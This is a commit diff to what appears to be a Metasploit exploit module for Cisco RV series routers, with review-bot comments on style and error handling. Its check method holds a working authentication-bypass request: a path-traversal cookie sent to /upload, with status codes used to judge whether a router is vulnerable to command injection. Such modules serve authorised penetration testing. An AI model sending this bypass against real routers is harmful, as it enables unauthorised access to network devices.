Rewrote check method to only abuse authentication bypass. Added additional status checks.
parent
036ed7f467
commit
79b1801a4f
|
@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
# sessionid utilized later needs to be set to length
|
||||||
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
|
# of 16 or exploit will fail. Tested with lengths
|
||||||
# Test to see if router is responding and possibly vulnerable
|
# 14-17
|
||||||
res = send_exploit('id')
|
def generate_session_id
|
||||||
|
return Rex::Text.rand_text_alphanumeric(16)
|
||||||
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
|
|
||||||
|
|
||||||
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
|
|
||||||
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
|
|
||||||
|
|
||||||
# Vulnerable versions will respond with 301 Moved Permanently in body of response
|
|
||||||
if res.body.include?('<head><title>301 Moved Permanently</title></head>')
|
|
||||||
return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
|
|
||||||
end
|
end
|
||||||
|
|
||||||
CheckCode::Safe('The target did not respond with an expected payload.')
|
def check
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => '/upload',
|
||||||
|
'headers' => {
|
||||||
|
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
|
||||||
|
}
|
||||||
|
}, 10)
|
||||||
|
|
||||||
|
# A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
|
||||||
|
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
|
||||||
|
# The firmware containing this authentication bypass also contains the command injection vulnerability that will be
|
||||||
|
# abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
|
||||||
|
if res.nil?
|
||||||
|
return CheckCode::Unknown('The device did not respond to request packet.')
|
||||||
|
elsif !res.nil? && res.code == 405
|
||||||
|
return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
|
||||||
|
elsif res.code == 403
|
||||||
|
return CheckCode::Safe('The device is not vulnerable to exploitation.')
|
||||||
|
else # Catch-all
|
||||||
|
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def execute_command(cmd, _opts = {})
|
def execute_command(cmd, _opts = {})
|
||||||
|
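Review bot: The new `check` keeps a redundant nil guard on the 405 branch: `elsif !res.nil? && res.code == 405` can only be reached after the `if res.nil?` branch has already returned, so it should read `elsif res.code == 405`. The catch-all message also has a typo that will show up in user-facing output, `'The target responded in such a way that exploitation in unknown and unlikely.'` → `'... exploitation is unknown and unlikely.'`, and the comment above it says `The router return a status code` where `returns` is meant. Separately, the verdict rests on the status code alone: any HTTP endpoint that answers GET `/upload` with 405 for unrelated reasons would be reported as `Appears`, so it would be worth documenting in the comment block that the 405 result is an inference from the bypass behaviour described there rather than a confirmation of the command injection, and, if the module has some other device fingerprint available, gating the `Appears` verdict on it to cut false positives. The Cookie header is built with `+` concatenation; string interpolation (`"sessionid =../../www/index.html; sessionid=#{generate_session_id}"`) matches the style of the rest of the module, and `return` in the one-line `generate_session_id` is unnecessary.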
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if target['Type'] == :linux_dropper
|
if target['Type'] == :linux_dropper
|
||||||
|
fail_with(Failure::Unreachable, 'The target did not respond') unless res
|
||||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
||||||
begin
|
begin
|
||||||
body_json = res.get_json_document
|
body_json = res.get_json_document
|
||||||
|
|
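Review bot: Once `fail_with(Failure::Unreachable, 'The target did not respond') unless res` has run, `res` is guaranteed non-nil, so the safe navigation on the next line is now redundant and slightly misleading about which case it handles: `fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200`. The `begin` block that parses the body starts here but its `rescue`/`end` lies outside the hunk, so I cannot see whether a malformed or non-JSON body is turned into a `fail_with` rather than an unhandled exception; a one-line comment above `body_json = res.get_json_document` stating what a parse failure maps to would help the next reader.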